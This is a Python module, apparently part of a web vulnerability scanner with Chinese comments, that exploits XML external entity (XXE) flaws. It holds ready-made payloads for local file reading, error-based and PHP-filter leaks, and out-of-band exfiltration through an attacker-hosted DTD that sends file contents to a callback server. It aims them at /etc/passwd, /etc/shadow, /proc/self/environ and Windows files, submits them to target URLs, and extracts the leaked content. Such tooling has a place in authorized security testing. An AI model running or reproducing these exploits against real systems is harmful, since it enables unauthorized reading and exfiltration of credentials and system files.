Files
2025-03-09 19:44:06 +08:00

532 lines
20 KiB
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
XXEXML外部实体注入漏洞利用模块
"""
import logging
import re
import urllib.parse
import random
import string
import base64
import time
import xml.dom.minidom
logger = logging.getLogger('xss_scanner')
class XXEExploit:
"""XXE漏洞利用类"""
def __init__(self, http_client):
"""
初始化XXE漏洞利用模块
Args:
http_client: HTTP客户端对象
"""
self.http_client = http_client
# XXE有效载荷模板
self.xxe_payloads = {
# 基本文件读取
"file_read": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
<foo>&xxe;</foo>""",
# 带外数据泄露 (OOB)
"oob_exfiltration": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///{file_path}">
<!ENTITY % dtd SYSTEM "{callback_server}/xxe.dtd">
%dtd;
]>
<foo>&send;</foo>""",
# 错误诱导泄露
"error_based": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///{file_path}">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<foo>Error Based XXE</foo>""",
# PHP过滤器
"php_filter": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}" >]>
<foo>&xxe;</foo>""",
# 参数实体
"parameter_entity": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///{file_path}" >
%xxe;
]>
<foo>Parameter Entity XXE</foo>""",
# SOAP注入
"soap_xxe": """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
<soap:Body><foo>&xxe;</foo></soap:Body>
</soap:Envelope>""",
# SVG注入
"svg_xxe": """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
<svg width="100" height="100">
<text x="10" y="20">&xxe;</text>
</svg>"""
}
# XXE DTD内容模板
self.xxe_dtd_template = """<!ENTITY % file SYSTEM "file:///{file_path}">
<!ENTITY % combined "<!ENTITY send SYSTEM '{callback_server}?data=%file;'>">
%combined;"""
# 敏感文件列表
self.sensitive_files = [
"/etc/passwd",
"/etc/hosts",
"/etc/shadow",
"/etc/group",
"/etc/issue",
"/etc/motd",
"/proc/self/environ",
"/proc/version",
"/proc/cmdline",
"C:/Windows/win.ini",
"C:/boot.ini",
"C:/Windows/System32/drivers/etc/hosts"
]
def exploit(self, vulnerability):
"""
利用XXE漏洞
Args:
vulnerability: 漏洞信息
Returns:
dict: 利用结果
"""
logger.info(f"尝试利用XXE漏洞: {vulnerability['url']}")
url = vulnerability.get('url')
parameter = vulnerability.get('parameter')
payload = vulnerability.get('payload', '')
form_action = vulnerability.get('form_action')
form_method = vulnerability.get('form_method', 'POST')
if not url or not parameter:
return {
'success': False,
'message': '缺少必要的漏洞信息(URL或参数名)',
'data': None
}
# 尝试读取敏感文件
for file_path in self.sensitive_files[:5]: # 只尝试前5个文件
result = self._read_file_via_xxe(url, parameter, file_path, form_action, form_method)
if result and result['success']:
return result
# 生成随机回调标识符
callback_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
callback_server = f"http://xxe-callback-{callback_id}.example.com"
# 如果没有成功读取文件提供OOB XXE的步骤
return {
'success': False,
'message': '无法通过本地测试确认XXE漏洞请尝试带外(OOB)XXE测试',
'data': {
'parameter': parameter,
'url': url,
'oob_details': {
'callback_id': callback_id,
'callback_server': callback_server
}
},
'manual_steps': [
"1. 设置一个你控制的Web服务器托管以下DTD文件:",
self.xxe_dtd_template.format(file_path="/etc/passwd", callback_server=callback_server),
"2. 确保该DTD文件可通过HTTP/HTTPS访问例如: http://your-server.com/xxe.dtd",
"3. 构造XXE payload:",
self.xxe_payloads["oob_exfiltration"].format(file_path="/etc/passwd", callback_server="http://your-server.com"),
"4. 将此payload注入到目标参数中",
"5. 如果你的服务器收到包含/etc/passwd内容的回调请求则确认存在XXE漏洞"
],
'poc': self.xxe_payloads["file_read"].format(file_path="/etc/passwd")
}
def _read_file_via_xxe(self, url, parameter, file_path, form_action=None, form_method=None):
"""
通过XXE读取文件
Args:
url: 目标URL
parameter: 参数名
file_path: 要读取的文件路径
form_action: 表单操作URL
form_method: 表单方法
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试通过XXE读取文件: {file_path}")
# 生成XXE有效载荷
xxe_payload = self.xxe_payloads["file_read"].format(file_path=file_path)
# 如果表单操作和方法都存在,使用表单提交
if form_action and form_method:
return self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
else:
return self._exploit_via_url(url, parameter, xxe_payload, file_path)
except Exception as e:
logger.error(f"尝试利用XXE漏洞时出错: {str(e)}")
return None
def _exploit_via_form(self, url, parameter, xxe_payload, file_path, form_action, form_method):
"""
通过表单提交利用XXE漏洞
Args:
url: 目标页面URL
parameter: 参数名
xxe_payload: XXE有效载荷
file_path: 要读取的文件路径
form_action: 表单操作URL
form_method: 表单方法
Returns:
dict: 利用结果
"""
try:
form_data = {parameter: xxe_payload}
# 设置请求头
headers = {
'Content-Type': 'application/xml',
'Accept': '*/*'
}
# 提交表单
if form_method.upper() == 'POST':
response = self.http_client.post(form_action, data=form_data, headers=headers)
else:
response = self.http_client.get(form_action, params=form_data, headers=headers)
# 检查响应是否包含文件内容特征
if response and response.status_code == 200:
extracted_content = self._extract_file_content(response.text, file_path)
if extracted_content:
logger.info(f"成功通过XXE读取文件: {file_path}")
return {
'success': True,
'message': f'成功利用XXE漏洞读取文件: {file_path}',
'data': {
'file_path': file_path,
'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
'full_content_length': len(extracted_content)
},
'poc': xxe_payload
}
except Exception as e:
logger.error(f"通过表单提交XXE有效载荷时出错: {str(e)}")
return None
def _exploit_via_url(self, url, parameter, xxe_payload, file_path):
"""
通过URL参数利用XXE漏洞
Args:
url: 目标URL
parameter: 参数名
xxe_payload: XXE有效载荷
file_path: 要读取的文件路径
Returns:
dict: 利用结果
"""
try:
# 构建包含XXE有效载荷的URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = xxe_payload
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 设置请求头
headers = {
'Content-Type': 'application/xml',
'Accept': '*/*'
}
# 发送请求
response = self.http_client.get(new_url, headers=headers)
# 检查响应是否包含文件内容特征
if response and response.status_code == 200:
extracted_content = self._extract_file_content(response.text, file_path)
if extracted_content:
logger.info(f"成功通过XXE读取文件: {file_path}")
return {
'success': True,
'message': f'成功利用XXE漏洞读取文件: {file_path}',
'data': {
'file_path': file_path,
'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
'full_content_length': len(extracted_content)
},
'poc': new_url
}
# 尝试使用POST方法
post_headers = {
'Content-Type': 'application/xml',
'Accept': '*/*'
}
post_response = self.http_client.post(url, data=xxe_payload, headers=post_headers)
if post_response and post_response.status_code == 200:
extracted_content = self._extract_file_content(post_response.text, file_path)
if extracted_content:
logger.info(f"成功通过POST XXE读取文件: {file_path}")
return {
'success': True,
'message': f'成功利用XXE漏洞POST方法读取文件: {file_path}',
'data': {
'file_path': file_path,
'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
'full_content_length': len(extracted_content)
},
'poc': xxe_payload,
'method': 'POST',
'target_url': url
}
except Exception as e:
logger.error(f"通过URL参数利用XXE漏洞时出错: {str(e)}")
return None
def _extract_file_content(self, response_text, file_path):
"""
从响应中提取文件内容
Args:
response_text: 响应文本
file_path: 尝试访问的文件路径
Returns:
str: 提取的文件内容如果未找到返回None
"""
# 根据文件类型识别特征
if '/etc/passwd' in file_path:
# 查找/etc/passwd文件特征
if re.search(r"root:.*:0:0:", response_text):
# 提取完整的passwd文件内容
passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
if passwd_lines:
return "\n".join(passwd_lines)
elif '/etc/hosts' in file_path:
# 查找/etc/hosts文件特征
if re.search(r"127\.0\.0\.1\s+localhost", response_text):
# 提取完整的hosts文件内容
hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
if hosts_content:
return hosts_content.group(1)
elif 'win.ini' in file_path.lower():
# 查找win.ini文件特征
if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
# 提取完整的win.ini文件内容
win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
if win_ini_content:
return win_ini_content.group(1)
# 检查是否包含Base64编码的内容
base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
matches = re.findall(base64_pattern, response_text)
for match in matches:
try:
# 尝试解码
decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
# 检查解码后的内容是否包含敏感信息
if (re.search(r"root:.*:0:0:", decoded) or
re.search(r"127\.0\.0\.1\s+localhost", decoded) or
re.search(r"\[fonts\]|\[extensions\]", decoded, re.IGNORECASE)):
return decoded
except Exception:
continue
# 通用文件内容检测
# 如果响应文本长度超过一定阈值且不包含HTML标签可能是文件内容
if len(response_text) > 20 and not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE):
# 去除可能的XML标签
clean_text = re.sub(r"<[^>]+>", "", response_text)
if len(clean_text.strip()) > 0:
return clean_text
return None
def _try_php_filter(self, url, parameter, file_path, form_action=None, form_method=None):
"""
尝试使用PHP过滤器
Args:
url: 目标URL
parameter: 参数名
file_path: 要读取的文件路径
form_action: 表单操作URL
form_method: 表单方法
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试使用PHP过滤器读取文件: {file_path}")
# 生成PHP过滤器XXE有效载荷
xxe_payload = self.xxe_payloads["php_filter"].format(file_path=file_path)
# 如果表单操作和方法都存在,使用表单提交
if form_action and form_method:
result = self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
else:
result = self._exploit_via_url(url, parameter, xxe_payload, file_path)
return result
except Exception as e:
logger.error(f"尝试使用PHP过滤器时出错: {str(e)}")
return None
def _try_oob_xxe(self, url, parameter, file_path, callback_server, form_action=None, form_method=None):
"""
尝试使用带外(OOB) XXE
Args:
url: 目标URL
parameter: 参数名
file_path: 要读取的文件路径
callback_server: 回调服务器URL
form_action: 表单操作URL
form_method: 表单方法
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试使用带外(OOB) XXE读取文件: {file_path}")
# 生成OOB XXE有效载荷
xxe_payload = self.xxe_payloads["oob_exfiltration"].format(
file_path=file_path,
callback_server=callback_server
)
# 如果表单操作和方法都存在,使用表单提交
if form_action and form_method:
form_data = {parameter: xxe_payload}
# 设置请求头
headers = {
'Content-Type': 'application/xml',
'Accept': '*/*'
}
# 提交表单
if form_method.upper() == 'POST':
self.http_client.post(form_action, data=form_data, headers=headers)
else:
self.http_client.get(form_action, params=form_data, headers=headers)
else:
# 构建包含XXE有效载荷的URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = xxe_payload
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 设置请求头
headers = {
'Content-Type': 'application/xml',
'Accept': '*/*'
}
# 发送请求
self.http_client.get(new_url, headers=headers)
# 等待回调服务器响应
# 注意:在实际环境中,这需要回调服务器的实现
time.sleep(2)
# 检查回调是否收到
# 这里假设有一个check_callback方法
if hasattr(self, 'check_callback') and self.check_callback(callback_server):
logger.info(f"成功通过OOB XXE获取文件内容: {file_path}")
return {
'success': True,
'message': f'成功通过带外(OOB) XXE读取文件: {file_path}',
'data': {
'file_path': file_path,
'callback_server': callback_server
},
'poc': xxe_payload
}
except Exception as e:
logger.error(f"尝试使用带外(OOB) XXE时出错: {str(e)}")
return None
def _prettify_xml(self, xml_string):
"""
美化XML字符串
Args:
xml_string: XML字符串
Returns:
str: 美化后的XML字符串
"""
try:
dom = xml.dom.minidom.parseString(xml_string)
pretty_xml = dom.toprettyxml()
return pretty_xml
except Exception:
return xml_string